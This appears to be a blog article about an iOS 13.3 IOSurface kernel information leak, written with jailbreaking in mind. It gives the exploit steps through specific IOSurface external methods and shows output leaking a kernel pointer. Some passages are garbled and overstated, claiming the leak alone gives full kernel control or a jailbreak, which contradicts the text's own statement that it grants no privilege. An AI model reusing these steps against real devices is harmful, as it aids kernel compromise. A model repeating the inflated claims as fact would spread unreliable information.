Here we are going to talk about a very important iOS 13.3.1 beta 2 bug. This could be used for making the latest jailbreak in the near future. That has been exploited will compatible with the latest version of iOS 13.3 available and any compatible device with the iOS 12, 13. Which exploit will be very useful in the near future for the latest iOS 13 jailbreak.
Many people independently catch and think about this bug as a simple bug. But when considering deeply about, this is another one of the major exploits. This can be categorized as a kernel information leak, not a fully-fledged kernel exploit. This will not grant any privilege to users at all. By the way, we can hope this could definitely show a path to developers and experts to a full-fledged kernel exploit. Kernel information leaks are one of the critical exploits if anyone trying to develop a jailbreak compatible with the previous iOS this will make reachable for any content they want. Because now they can see the kernel itself and can make changes easily with using other exploits too.
When a user, tester, developer or anyone run in userland and the kernel starts itself runs more privileged and it has all the hidden privileges package. The kernel star dominance user as userland and as the mobile user both.
Users can see and access but users haven’t any control over the kernel. When a developer or tester is trying to develop a jailbreak, they need to acquire erratic access privileges to the kernel in some way. And now with this exploit kernel itself gives you the door keys. Without this all they able to run the applications users install from the Apple App Store only.
Without this small bug, the user can't easily launch, terminate processes alone or inject anything such as tweaks, themes into the iOS system.
As previously explained this bug provides user access to memory through the kernel. With a bug like this users get addresses to access from the kernel memory and by that, they get ports access. This allows them to modify, read and obtain TFP0.
Within this process, the user achieves full control over the iOS kernel. So from now on, they’re able to do whatever they want. As an example install tweaks, themes, installing TaigOne or even jailbreak. Actually all they needed so far is something to breach the wall. And finally, This successfully breaks the wall itself.
Now let’s exploit it.
I chose IOSurface because that’s available in the contexts most people care about (3rd party app container and WebContent), and exists both on iOS and macOS.
First of all, what you need to do is run the function. Pick any IOKit driver that allows you to access it.
After the usual IOSurface setup (creation of the userclient and surface), all you have to do is:
- Call setNotify (external method 17) with one of the async functions and pass it a mach port.
- Call incrementUseCount followed by decrementUseCount (methods 14 and 15 respectively) - I have no idea what they’re really intended for, but if the count they operate on hits zero, a message is sent back to userland.
- Receive a message on your mach port and enjoy your free kernel pointer.
port: 100b, (os/kern) successful
client: 1707, (os/kern) successful
newSurface: 1b, (os/kern) successful
setNotify: (os/kern) successful
incrementUseCount: (os/kern) successful
decrementUseCount: (os/kern) successful
mach_msg: (os/kern) successful
port addr: 0xffffff8070c57808
And here You've got the latest kernel pointer of the iOS 13.3. Finally, thanks to this simple bug you got a perfect kernel pointer and its control. Now you have several ways to convert this into a full-fledged kernel exploit and with that, then you can find the property fp0 pod. Hey there user, now basically you are jailbroken. This exploits available for the latest version iOS 13.3.